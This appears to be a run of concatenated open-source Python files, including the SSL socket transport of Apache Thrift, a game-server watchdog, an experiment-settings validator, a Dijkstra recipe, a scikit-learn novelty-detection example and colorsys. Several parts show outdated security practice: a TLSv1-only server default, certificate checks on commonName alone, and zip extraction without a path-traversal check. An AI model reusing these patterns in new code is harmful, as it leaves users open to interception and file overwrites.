message = 'Could not connect to %s:%d: %s' % (self.host, self.port, e)
raise TTransportException(type=TTransportException.NOT_OPEN,
message=message)
if self.validate:
self._validate_cert()
def _validate_cert(self):
"""internal method to validate the peer's SSL certificate, and to check the
commonName of the certificate to ensure it matches the hostname we
used to make this connection. Does not support subjectAltName records
in certificates.
raises TTransportException if the certificate fails validation.
"""
cert = self.handle.getpeercert()
self.peercert = cert
if 'subject' not in cert:
raise TTransportException(
type=TTransportException.NOT_OPEN,
message='No SSL certificate found from %s:%s' % (self.host, self.port))
fields = cert['subject']
for field in fields:
# ensure structure we get back is what we expect
if not isinstance(field, tuple):
continue
cert_pair = field[0]
if len(cert_pair) < 2:
continue
cert_key, cert_value = cert_pair[0:2]
if cert_key != 'commonName':
continue
certhost = cert_value
# this check should be performed by some sort of Access Manager
if certhost == self.host:
# success, cert commonName matches desired hostname
self.is_valid = True
return
else:
raise TTransportException(
type=TTransportException.UNKNOWN,
message='Hostname we connected to "%s" doesn\'t match certificate '
'provided commonName "%s"' % (self.host, certhost))
raise TTransportException(
type=TTransportException.UNKNOWN,
message='Could not validate SSL certificate from '
'host "%s". Cert=%s' % (self.host, cert))
class TSSLServerSocket(TSocket.TServerSocket):
"""SSL implementation of TServerSocket
This uses the ssl module's wrap_socket() method to provide SSL
negotiated encryption.
"""
SSL_VERSION = ssl.PROTOCOL_TLSv1
def __init__(self,
host=None,
port=9090,
certfile='cert.pem',
unix_socket=None):
"""Initialize a TSSLServerSocket
@param certfile: filename of the server certificate, defaults to cert.pem
@type certfile: str
@param host: The hostname or IP to bind the listen socket to,
i.e. 'localhost' for only allowing local network connections.
Pass None to bind to all interfaces.
@type host: str
@param port: The port to listen on for inbound connections.
@type port: int
"""
self.setCertfile(certfile)
TSocket.TServerSocket.__init__(self, host, port)
def setCertfile(self, certfile):
"""Set or change the server certificate file used to wrap new connections.
@param certfile: The filename of the server certificate,
i.e. '/etc/certs/server.pem'
@type certfile: str
Raises an IOError exception if the certfile is not present or unreadable.
"""
if not os.access(certfile, os.R_OK):
raise IOError('No such certfile found: %s' % (certfile))
self.certfile = certfile
def accept(self):
plain_client, addr = self.handle.accept()
try:
client = ssl.wrap_socket(plain_client, certfile=self.certfile,
server_side=True, ssl_version=self.SSL_VERSION)
except ssl.SSLError, ssl_exc:
# failed handshake/ssl wrap, close socket to client
plain_client.close()
# raise ssl_exc
# We can't raise the exception, because it kills most TServer derived
# serve() methods.
# Instead, return None, and let the TServer instance deal with it in
# other exception handling. (but TSimpleServer dies anyway)
return None
result = TSocket.TSocket()
result.setHandle(client)
return result
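# Client-side usage sketch (host and certificate paths are illustrative
# assumptions):
#
#     transport = TSSLSocket(host='thrift.example.com', port=9090,
#                            validate=True, ca_certs='/etc/certs/cacert.pem')
#     transport.open()  # raises TTransportException on connect or validation failure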
| apache-2.0 |
iut-ibk/DynaMind-UrbanSim | 3rdparty/opus/src/urbansim/configs/hlcm_estimation_config.py | 2 | 1304 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.configs.estimation_base_config import run_configuration as config
from urbansim.configs.base_configuration import AbstractUrbansimConfiguration
from urbansim.configs.estimation_base_config import EstimationBaseConfig
class HLCMEstimationConfig(EstimationBaseConfig):
def __init__(self, base_configuration=AbstractUrbansimConfiguration):
EstimationBaseConfig.__init__(self, base_configuration)
self.update_config()
def update_config(self):
self.merge(get_changes_for_hlcm_estimation(self))
def get_changes_for_hlcm_estimation(config=None):
estimation_configuration = {}
estimation_configuration["models"] = [
{"household_relocation_model": ["run"]},
{"household_location_choice_model": ["estimate"]}
]
estimation_configuration["datasets_to_preload"] = {
'gridcell':{},
'household':{}
}
return estimation_configuration
run_configuration = config.copy()
estimation_configuration = get_changes_for_hlcm_estimation()
run_configuration.merge(estimation_configuration)
| gpl-2.0 |
EricNeedham/assignment-1 | venv/lib/python2.7/site-packages/setuptools/tests/environment.py | 359 | 4658 | import os
import zipfile
import sys
import tempfile
import unittest
import shutil
import stat
import unicodedata
from subprocess import Popen as _Popen, PIPE as _PIPE
def _extract(self, member, path=None, pwd=None):
"""for zipfile py2.5 borrowed from cpython"""
if not isinstance(member, zipfile.ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
return _extract_member(self, member, path, pwd)
def _extract_from_zip(self, name, dest_path):
dest_file = open(dest_path, 'wb')
try:
dest_file.write(self.read(name))
finally:
dest_file.close()
def _extract_member(self, member, targetpath, pwd):
"""for zipfile py2.5 borrowed from cpython"""
    # build the destination pathname, replacing
    # forward slashes with platform-specific separators.
# Strip trailing path separator, unless it represents the root.
if (targetpath[-1:] in (os.path.sep, os.path.altsep)
and len(os.path.splitdrive(targetpath)[1]) > 1):
targetpath = targetpath[:-1]
# don't include leading "/" from file name if present
if member.filename[0] == '/':
targetpath = os.path.join(targetpath, member.filename[1:])
else:
targetpath = os.path.join(targetpath, member.filename)
targetpath = os.path.normpath(targetpath)
# Create all upper directories if necessary.
upperdirs = os.path.dirname(targetpath)
if upperdirs and not os.path.exists(upperdirs):
os.makedirs(upperdirs)
if member.filename[-1] == '/':
if not os.path.isdir(targetpath):
os.mkdir(targetpath)
return targetpath
_extract_from_zip(self, member.filename, targetpath)
return targetpath
def _remove_dir(target):
    #on Windows this seems to be a problem
for dir_path, dirs, files in os.walk(target):
os.chmod(dir_path, stat.S_IWRITE)
for filename in files:
os.chmod(os.path.join(dir_path, filename), stat.S_IWRITE)
shutil.rmtree(target)
class ZippedEnvironment(unittest.TestCase):
datafile = None
dataname = None
old_cwd = None
def setUp(self):
if self.datafile is None or self.dataname is None:
return
if not os.path.isfile(self.datafile):
self.old_cwd = None
return
self.old_cwd = os.getcwd()
self.temp_dir = tempfile.mkdtemp()
    zip_file = None
try:
zip_file = zipfile.ZipFile(self.datafile)
for files in zip_file.namelist():
_extract(zip_file, files, self.temp_dir)
finally:
if zip_file:
zip_file.close()
del zip_file
os.chdir(os.path.join(self.temp_dir, self.dataname))
def tearDown(self):
#Assume setUp was never completed
if self.dataname is None or self.datafile is None:
return
try:
if self.old_cwd:
os.chdir(self.old_cwd)
_remove_dir(self.temp_dir)
except OSError:
#sigh?
pass
def _which_dirs(cmd):
result = set()
for path in os.environ.get('PATH', '').split(os.pathsep):
filename = os.path.join(path, cmd)
if os.access(filename, os.X_OK):
result.add(path)
return result
def run_setup_py(cmd, pypath=None, path=None,
data_stream=0, env=None):
"""
Execution command for tests, separate from those used by the
code directly to prevent accidental behavior issues
"""
if env is None:
env = dict()
for envname in os.environ:
env[envname] = os.environ[envname]
#override the python path if needed
if pypath is not None:
env["PYTHONPATH"] = pypath
    #override the execution path if needed
if path is not None:
env["PATH"] = path
if not env.get("PATH", ""):
env["PATH"] = _which_dirs("tar").union(_which_dirs("gzip"))
env["PATH"] = os.pathsep.join(env["PATH"])
cmd = [sys.executable, "setup.py"] + list(cmd)
#regarding the shell argument, see: http://bugs.python.org/issue8557
try:
proc = _Popen(cmd, stdout=_PIPE, stderr=_PIPE,
shell=(sys.platform == 'win32'), env=env)
data = proc.communicate()[data_stream]
except OSError:
return 1, ''
#decode the console string if needed
if hasattr(data, "decode"):
        data = data.decode() # should use the preferred encoding
    data = unicodedata.normalize('NFC', data)
    #communicate() calls wait()
return proc.returncode, data
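# Example invocation (a sketch; the argument list is an assumption):
#
#     returncode, output = run_setup_py(['--version'], data_stream=0)
#     assert returncode == 0, output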
| mit |
fisadev/chivalry-server-tools | server_runner.py | 1 | 3556 | # coding: utf-8
from datetime import datetime
from os import popen, system, startfile
from time import sleep
import requests
from pyquery import PyQuery
# web listing active servers
SERVER_STATUS_URL = 'http://refactor.jp/chivalry/?country=AR'
# if this text is present, the server is up
SERVER_NAME = 'Argentina | Round Table | chivarg.com'
# if this text is present, the web list is working
WEB_CONTROL_TEXT = 'Servers in'
# windows task name of the server
TASK_NAME = 'UDKLogging.exe'
# path to the server bat file to start it
SERVER_SCRIPT = r'C:\Documents and Settings\mejorserver\Desktop\chivalry\round_table\start_server.bat'
# time intervals, in seconds
# every how much check for visibility?
CHECK_INTERVAL = 300
# how much does the server takes to start and appear on the lists
SERVER_START_DELAY = 300
# how much does the server takes to stop
SERVER_STOP_DELAY = 30
# how much to wait after an "unknown" result in the visibility
UNKNOWN_VISIBILITY_DELAY = 60
# possible server visibility values
VISIBLE = 'visible'
INVISIBLE = 'invisible'
UNKNOWN = 'unknown'
def server_visible():
"""Is the server visible in the servers list?"""
print 'Checking server visibility...'
try:
response = requests.get(SERVER_STATUS_URL).content
if WEB_CONTROL_TEXT not in response:
# can't be sure the web is working, the page is returning something
# not expected
visibility = UNKNOWN
elif SERVER_NAME not in response:
# server not in list, is invisible
visibility = INVISIBLE
else:
# server in list, but is it responding?
no_response_row = PyQuery(response)('a:contains("%s")' % SERVER_NAME).parents('.noResponse')
if no_response_row:
# the site says the server is not responding
visibility = INVISIBLE
else:
# server visible! yay for uptime :)
visibility = VISIBLE
except Exception as err:
# web not accessible, can't be sure of server status
print err
visibility = UNKNOWN
print 'Result:', visibility
return visibility
def server_running():
"""Is the server process running in windows?"""
print 'Checking server running...'
tasks = popen('tasklist').read()
running = TASK_NAME in tasks
print 'Result:', running
return running
def stop_server():
"""Kill the server process in windows."""
print 'Stopping server...'
system('taskkill /im ' + TASK_NAME)
sleep(SERVER_STOP_DELAY)
print 'Done'
def start_server():
"""Start the server process in windows."""
print 'Starting server...'
startfile(SERVER_SCRIPT)
sleep(SERVER_START_DELAY)
print 'Done'
def check_loop():
while True:
print 'Check', datetime.now()
running = server_running()
if running:
# server running, is it visible?
visibility = server_visible()
if visibility == INVISIBLE:
# stop it, will be restarted in next check
stop_server()
elif visibility == VISIBLE:
# everything fine, wait for next check
sleep(CHECK_INTERVAL)
elif visibility == UNKNOWN:
# don't know if visible, try again
sleep(UNKNOWN_VISIBILITY_DELAY)
else:
# server not running, start it and wait for it to appear on lists
# before doing another check
start_server()
check_loop()
| mit |
mathi123/vertical-construction | base_construction_architect/__openerp__.py | 1 | 1348 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Mathias Colpaert
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "OCA Construction: Architect Base",
'summary': "Identify partners as architects.",
'description': """
This module allows you to:
- Identify a partner as an architect.
- Filter architects from address book.
""",
'author': "Mathias Colpaert, Odoo Community Association (OCA)",
'category': "construction",
'version': '0.1',
'depends': ['base'],
'data': ['views.xml'],
}
| agpl-3.0 |
BBN-Q/PyQLab | ExpSettingsVal.py | 3 | 13830 | '''
ExpSettingsVal -
Validates Experimental Settings against a set of rules known to cause
the Compiler (Compiler.py) to fail if they are not followed
Created on April 17, 2015
Original Author: Brian Donovan
Copyright 2015 Raytheon BBN Technologies
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from builtins import str
import floatbits
import itertools
import re
import h5py
from atom.api import Str
import Sweeps
import Libraries
import QGL.Channels
import QGL.ChannelLibrary
channels = QGL.ChannelLibrary.channelLib
instruments = Libraries.instrumentLib.instrDict
measurements = Libraries.measLib.filterDict
sweeps = Libraries.sweepLib.sweepDict
# The following naming conventions are currently enforced
# See: https://github.com/BBN-Q/PyQLab/wiki
#
# Two LogicalMarkerChannels are required:
# 1 digitizerTrig
# 2 slaveTrig
#
# Logical Channels:
# 1 PhysicalChannel must be in library
# 2 LogicalMarkerChannel must map to PhysicalMarkerChannel
# 3 A channel that is not a LogicalMarkerChannel must not map to a PhysicalMarkerChannel
#
# Physical Channels:
# 1 PhysicalChannel must have an AWG assigned
# 2 The assigned AWG must exist in the library
# 3 The name of the PhysicalChannel channel must be of the form AWGName-AWGChannel
# 4 Device specific naming conventions
# APS: 12, 34, 1m1, 2m1, 3m1, 4m1
# APS2: 12, 12m1, 12m2, 12m3, 12m4
# Tek5014: 12, 34, 1m1, 1m2, 2m1, 2m2, 3m1, 3m2, 4m1, 4m2
#
# Instruments Names:
# 1 Instrument names must be valid Matlab Identifiers
# Conventions to be added
#
#
#####################################################################################
## Program Constants
# Matlab valid identifier -- Starts with a letter, followed by letters, digits, or underscores.
# Maximum length is the return value from the namelengthmax function
# namelengthmax returned 63 on Matlab 2015a 64-bit linux
MATLAB_NAME_LENGTH_MAX = 63
MATLAB_FORMAT_STRING = r"\A[a-zA-Z]\w{0,%i}?\Z" % (MATLAB_NAME_LENGTH_MAX - 1)
MATLAB_VALID_NAME_REGEX = re.compile(MATLAB_FORMAT_STRING)
#####################################################################################
## Helper functions for list comprehension
def is_logicalmarker_channel(name):
return is_channel_type(name, QGL.Channels.LogicalMarkerChannel)
def is_physical_channel(name):
return is_channel_type(name, QGL.Channels.PhysicalChannel)
def is_physicalmarker_channel(name):
return is_channel_type(name, QGL.Channels.PhysicalMarkerChannel)
def is_physicalIQ_channel(name):
return is_channel_type(name, QGL.Channels.PhysicalQuadratureChannel)
def is_qubit_channel(name):
return is_channel_type(name, QGL.Channels.Qubit)
def is_measurement_channel(name):
return is_channel_type(name, QGL.Channels.Measurement)
def requires_physical_channel(name):
return is_channel_type(name, QGL.Channels.LogicalChannel)
def is_channel_type(name, channelType):
return isinstance(channels[name], channelType)
#####################################################################################
### Apply global rules
def test_require_physical():
"""Enforces rule requiring physical channels for certain logical channels
See requires_physical_channel() for list of Channel types requiring a
Physical channel.
"""
errors = []
channels = QGL.ChannelLibrary.channelLib
testChannels = [channelName for channelName in channels.keys() if requires_physical_channel(channelName)]
for channel in testChannels:
physicalChannel = channels[channel].physChan
if physicalChannel is None:
errMsg = '"{0}" channel "{1}" Physical Channel is not defined'.format(channels[channel].__class__.__name__, channel)
errors.append(errMsg)
else:
physicalChannelName = channels[channel].physChan.label
if physicalChannelName not in channels.keys():
errMsg = 'Physical Channel "{0}" not found'.format(physicalChannelName)
errors.append(errMsg)
return errors
## Apply invidual test based on channel type
def test_logical_channels():
"""
Enforces rules applied against logical channels
These are rules in addition to those applied at the global level.
Rules:
    PhysicalChannel must be in library
"Markerness" of logical and physical channels must match, i.e.
LogicalMarkerChannel must map to PhysicalMarkerChannel.
"""
errors = []
channels = QGL.ChannelLibrary.channelLib
# require all LogicalMarkerChannels to map to PhysicalMarkerChannels
# and require all not LogicalMarkerChannels to map to not PhysicalMarkerChannels
logicalChannels = [channelName for channelName in channels.keys() if requires_physical_channel(channelName)]
for channel in logicalChannels:
errorHeader = '{0} Markerness of {1} and {2} do not match'
if not channels[channel].physChan:
continue
physicalChannelName = channels[channel].physChan.label
if physicalChannelName not in channels.keys():
continue
if is_logicalmarker_channel(channel) != is_physicalmarker_channel(physicalChannelName):
errMsg = errorHeader.format(channels[channel].__class__.__name__, channel, physicalChannelName)
errors.append(errMsg)
return errors
def test_physical_channels():
"""
Enforces rules applied against physical channels
Rules:
PhysicalChannel must have an instrument (AWG or digitizer) assigned
The assigned instrument must exist in the library
The name of the PhysicalChannel channel must be of the form AWGName-AWGChannel
Device channels have model specific naming conventions
"""
errors = []
channels = QGL.ChannelLibrary.channelLib
physicalChannels = [channelName for channelName in channels.keys() if is_physical_channel(channelName)]
for channel in physicalChannels:
instrument = channels[channel].instrument
if instrument == '':
errMsg = 'Physical Channel "{0}" requires an instrument assignment'.format(channel)
errors.append(errMsg)
elif instrument not in instruments.keys():
            errMsg = 'Physical Channel "{0}" instrument {1} not found'.format(channel, instrument)
errors.append(errMsg)
# test AWG name to channel format
validName = True
validName &= '-' in channel
if validName:
instrName, instrChan = channel.rsplit('-',1)
if instrName not in instruments.keys():
errMsg = 'Physical Channel "{0}" Label format is invalid. It should be Name-Channel'.format(channel)
errors.append(errMsg)
if instrName != instrument:
errMsg = 'Physical Channel "{0}" Label instrName {1} != instrument.label {2}'.format(channel, instrName, instrument)
errors.append(errMsg)
            # apply device specific channel naming conventions
            # force conversion of awgChan to unicode so multimethod dispatch will
# work with str or unicode
errMsg = invalid_awg_name_convention(channels[channel].instrument, str(instrChan))
if errMsg:
errors.append(errMsg)
else:
errMsg = 'Physical Channel "{0}" Label format is invalid. It should be Name-Channel'.format(channel)
errors.append(errMsg)
return errors
#####################################################################################
## AWG Model Type naming conventions
def invalid_awg_name_convention_common(label, channelName, conventionList):
errorStr = 'instrument {0} channel name {1} not in convention list {2}'
if channelName not in conventionList:
return errorStr.format(label, channelName, conventionList)
return None
def invalid_awg_name_convention(awgLabel, channelName):
instr = instruments[awgLabel]
convention = instr.get_naming_convention()
return invalid_awg_name_convention_common(awgLabel, channelName,convention)
# GUI validator
def is_valid_awg_channel_name(channelName):
    if '-' in channelName:
        awgName, awgChan = channelName.rsplit('-', 1)
    else:
        # without a '-' there is no channel part, so the convention cannot match
        return False
if awgName not in instruments.keys():
return False
return (invalid_awg_name_convention(awgName, awgChan) is None)
#####################################################################################
def is_valid_instrument_name(label):
# instrument must be a valid Matlab identifier
return (MATLAB_VALID_NAME_REGEX.match(label) is not None)
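# Illustrative expectations for the regex above (assumed, not exhaustive):
#   is_valid_instrument_name('APS1')   -> True  (starts with a letter)
#   is_valid_instrument_name('1APS')   -> False (may not start with a digit)
#   is_valid_instrument_name('my-awg') -> False ('-' is not a word character)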
def validate_instrumentLib():
errors = []
invalidNames = [instrument for instrument in instruments.keys() if not is_valid_instrument_name(instrument)]
if invalidNames != []:
for name in invalidNames:
errMsg = "Instrument name {0} is not a valid Matlab Name".format(name)
errors.append(errMsg)
return errors
#####################################################################################
def validate_sweepLib():
errors = []
for key in sweeps.keys():
if isinstance(sweeps[key],Sweeps.PointsSweep):
try:
numPoints = int((sweeps[key].stop - sweeps[key].start)/floatbits.prevfloat(sweeps[key].step)) + 1
except ValueError as e:
errors.append("Sweep named %s issue computing Num. Points: %s" % (sweeps[key].label,e))
return errors
#####################################################################################
def validate_channelLib():
errors = []
if 'digitizerTrig' not in channels.keys():
errMsg = 'A LogicalMarkerChannel named digitizerTrig is required'
errors.append([errMsg])
# test gate pulses
if 'slaveTrig' not in channels.keys():
errMsg = 'A LogicalMarkerChannel named slaveTrig is required'
errors.append([errMsg])
# test map_logical_to_physical
rp_errors = test_require_physical()
pc_errors = test_physical_channels()
lc_errors = test_logical_channels()
if pc_errors != []:
errors.append(pc_errors)
if lc_errors != []:
errors.append(lc_errors)
if rp_errors != []:
errors.append(rp_errors)
errors = list(itertools.chain(*errors))
return errors
def validate_dynamic_lib(channelsLib, instrumentLib):
global channels
global instruments
channels = channelsLib
instruments = instrumentLib.instrDict
return validate_lib()
def validate_lib():
errors = []
channel_errors = validate_channelLib()
if channel_errors != []:
errors.append(channel_errors)
instrument_errors = validate_instrumentLib()
if instrument_errors != []:
errors.append(instrument_errors)
sweep_errors = validate_sweepLib()
if sweep_errors != []:
errors.append(sweep_errors)
errors = list(itertools.chain(*errors))
return errors
def default_repr(items, item):
return '\t{0}: {1}'.format(item,
items[item].__class__.__name__)
def default_list_repr(items, name):
print("Listing available {}:".format(name))
for item in items.keys():
print(default_repr(items,item))
def list_channels():
print("Listing available channels:")
for channel in channels.keys():
print("\t", repr(channels[channel]))
def list_instruments():
default_list_repr(instruments, 'instruments')
def list_measurements():
default_list_repr(measurements, 'measurements')
def list_sweeps():
default_list_repr(sweeps, 'sweeps')
def list_config():
list_channels()
print
list_instruments()
print
list_measurements()
print
list_sweeps()
def draw_wiring_diagram():
topLevelChannels = [channelName for channelName in channels.keys() if requires_physical_channel(channelName)]
print("digraph Exp {")
for channel in topLevelChannels:
print('"{}"'.format(channel))
if channels[channel].physChan is not None:
print(' -> "{}"'.format(channels[channel].physChan.label))
if channels[channel].physChan.AWG is not None:
print(' -> "{}"'.format(channels[channel].physChan.AWG.label))
typeMap = (
(is_logicalmarker_channel,"lightblue"),
(is_physicalmarker_channel,"red"),
(is_physicalIQ_channel,"blue"),
(is_qubit_channel,"yellow"),
)
for lookup, color in typeMap:
names = [channelName for channelName in channels.keys() if lookup(channelName)]
for channel in names:
print("{0} [color={1},style=filled];".format(channel, color))
instrumentNames = [channelName for channelName in instruments.keys()]
for channel in instrumentNames:
print("{} [color=green,style=filled];".format(channel))
print("}")
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
    parser.add_argument('-d', dest='draw_diagram', action='store_true')
parser.add_argument('-v', dest='validate', action='store_true')
parser.add_argument('-l', dest='list', action='store_true')
args = parser.parse_args()
    if args.draw_diagram:
        draw_wiring_diagram()
if args.validate:
error = validate_lib()
print(error)
if args.list:
list_config()
| apache-2.0 |
xpansa/pmis | project_time_schedule/models/dijkstra.py | 1 | 3303 | # Dijkstra's algorithm for shortest paths
# David Eppstein, UC Irvine, 4 April 2002
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/117228
from priodict import priorityDictionary
def Dijkstra(G, start, end=None):
"""
Find shortest paths from the start vertex to all
vertices nearer than or equal to the end.
The input graph G is assumed to have the following
representation: A vertex can be any object that can
be used as an index into a dictionary. G is a
dictionary, indexed by vertices. For any vertex v,
G[v] is itself a dictionary, indexed by the neighbors
of v. For any edge v->w, G[v][w] is the length of
the edge. This is related to the representation in
<http://www.python.org/doc/essays/graphs.html>
where Guido van Rossum suggests representing graphs
as dictionaries mapping vertices to lists of neighbors,
however dictionaries of edges have many advantages
over lists: they can store extra information (here,
the lengths), they support fast existence tests,
and they allow easy modification of the graph by edge
insertion and removal. Such modifications are not
needed here but are important in other graph algorithms.
Since dictionaries obey iterator protocol, a graph
represented as described here could be handed without
modification to an algorithm using Guido's representation.
Of course, G and G[v] need not be Python dict objects;
they can be any other object that obeys dict protocol,
for instance a wrapper in which vertices are URLs
and a call to G[v] loads the web page and finds its links.
The output is a pair (D,P) where D[v] is the distance
from start to v and P[v] is the predecessor of v along
the shortest path from s to v.
Dijkstra's algorithm is only guaranteed to work correctly
when all edge lengths are positive. This code does not
verify this property for all edges (only the edges seen
before the end vertex is reached), but will correctly
compute shortest paths even for some graphs with negative
edges, and will raise an exception if it discovers that
a negative edge has caused it to make a mistake.
"""
D = {} # dictionary of final distances
P = {} # dictionary of predecessors
Q = priorityDictionary() # est.dist. of non-final vert.
Q[start] = 0
for v in Q:
D[v] = Q[v]
if v == end:
break
for w in G[v]:
vwLength = D[v] + G[v][w]
if w in D:
if vwLength < D[w]:
raise ValueError(
"Dijkstra: found better path to already-final vertex"
)
elif w not in Q or vwLength < Q[w]:
Q[w] = vwLength
P[w] = v
return (D, P)
def shortestPath(G, start, end):
"""
Find a single shortest path from the given start vertex
to the given end vertex.
The input has the same conventions as Dijkstra().
The output is a list of the vertices in order along
the shortest path.
"""
D, P = Dijkstra(G, start, end)
Path = []
    while True:
Path.append(end)
if end == start:
break
end = P[end]
Path.reverse()
return Path
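# Worked example (graph and weights are illustrative):
#
#     G = {'s': {'u': 10, 'x': 5},
#          'u': {'v': 1, 'x': 2},
#          'v': {'y': 4},
#          'x': {'u': 3, 'v': 9, 'y': 2},
#          'y': {'s': 7, 'v': 6}}
#     shortestPath(G, 's', 'v')  # -> ['s', 'x', 'u', 'v'], total length 9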
| agpl-3.0 |
zorojean/scikit-learn | examples/svm/plot_oneclass.py | 249 | 2302 | """
==========================================
One-class SVM with non-linear kernel (RBF)
==========================================
An example using a one-class SVM for novelty detection.
:ref:`One-class SVM <svm_outlier_detection>` is an unsupervised
algorithm that learns a decision function for novelty detection:
classifying new data as similar or different to the training set.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.font_manager
from sklearn import svm
xx, yy = np.meshgrid(np.linspace(-5, 5, 500), np.linspace(-5, 5, 500))
# Generate train data
X = 0.3 * np.random.randn(100, 2)
X_train = np.r_[X + 2, X - 2]
# Generate some regular novel observations
X = 0.3 * np.random.randn(20, 2)
X_test = np.r_[X + 2, X - 2]
# Generate some abnormal novel observations
X_outliers = np.random.uniform(low=-4, high=4, size=(20, 2))
# fit the model
clf = svm.OneClassSVM(nu=0.1, kernel="rbf", gamma=0.1)
clf.fit(X_train)
y_pred_train = clf.predict(X_train)
y_pred_test = clf.predict(X_test)
y_pred_outliers = clf.predict(X_outliers)
n_error_train = y_pred_train[y_pred_train == -1].size
n_error_test = y_pred_test[y_pred_test == -1].size
n_error_outliers = y_pred_outliers[y_pred_outliers == 1].size
# plot the line, the points, and the nearest vectors to the plane
Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.title("Novelty Detection")
plt.contourf(xx, yy, Z, levels=np.linspace(Z.min(), 0, 7), cmap=plt.cm.Blues_r)
a = plt.contour(xx, yy, Z, levels=[0], linewidths=2, colors='red')
plt.contourf(xx, yy, Z, levels=[0, Z.max()], colors='orange')
b1 = plt.scatter(X_train[:, 0], X_train[:, 1], c='white')
b2 = plt.scatter(X_test[:, 0], X_test[:, 1], c='green')
c = plt.scatter(X_outliers[:, 0], X_outliers[:, 1], c='red')
plt.axis('tight')
plt.xlim((-5, 5))
plt.ylim((-5, 5))
plt.legend([a.collections[0], b1, b2, c],
["learned frontier", "training observations",
"new regular observations", "new abnormal observations"],
loc="upper left",
prop=matplotlib.font_manager.FontProperties(size=11))
plt.xlabel(
"error train: %d/200 ; errors novel regular: %d/40 ; "
"errors novel abnormal: %d/40"
% (n_error_train, n_error_test, n_error_outliers))
plt.show()
| bsd-3-clause |
ofermend/medicare-demo | socialite/jython/Lib/colorsys.py | 92 | 3449 | """Conversion functions between RGB and other color systems.
This modules provides two functions for each color system ABC:
rgb_to_abc(r, g, b) --> a, b, c
abc_to_rgb(a, b, c) --> r, g, b
All inputs and outputs are triples of floats in the range [0.0...1.0]
(with the exception of I and Q, which cover a slightly larger range).
Inputs outside the valid range may cause exceptions or invalid outputs.
Supported color systems:
RGB: Red, Green, Blue components
YIQ: Luminance, Chrominance (used by composite video signals)
HLS: Hue, Luminance, Saturation
HSV: Hue, Saturation, Value
"""
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.60*r - 0.28*g - 0.32*b
q = 0.21*r - 0.52*g + 0.31*b
return (y, i, q)
def yiq_to_rgb(y, i, q):
r = y + 0.948262*i + 0.624013*q
g = y - 0.276066*i - 0.639810*q
b = y - 1.105450*i + 1.729860*q
if r < 0.0: r = 0.0
if g < 0.0: g = 0.0
if b < 0.0: b = 0.0
if r > 1.0: r = 1.0
if g > 1.0: g = 1.0
if b > 1.0: b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc: return 0.0, l, 0.0
if l <= 0.5: s = (maxc-minc) / (maxc+minc)
else: s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc: h = bc-gc
elif g == maxc: h = 2.0+rc-bc
else: h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0: return l, l, l
if l <= 0.5: m2 = l * (1.0+s)
else: m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH: return m1 + (m2-m1)*hue*6.0
if hue < 0.5: return m2
if hue < TWO_THIRD: return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc: return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc: h = bc-gc
elif g == maxc: h = 2.0+rc-bc
else: h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0: return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
if i%6 == 0: return v, t, p
if i == 1: return q, v, p
if i == 2: return p, v, t
if i == 3: return p, q, v
if i == 4: return t, p, v
if i == 5: return v, p, q
# Cannot get here
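# Round-trip sketch (example values; every channel is a float in [0.0, 1.0]):
#
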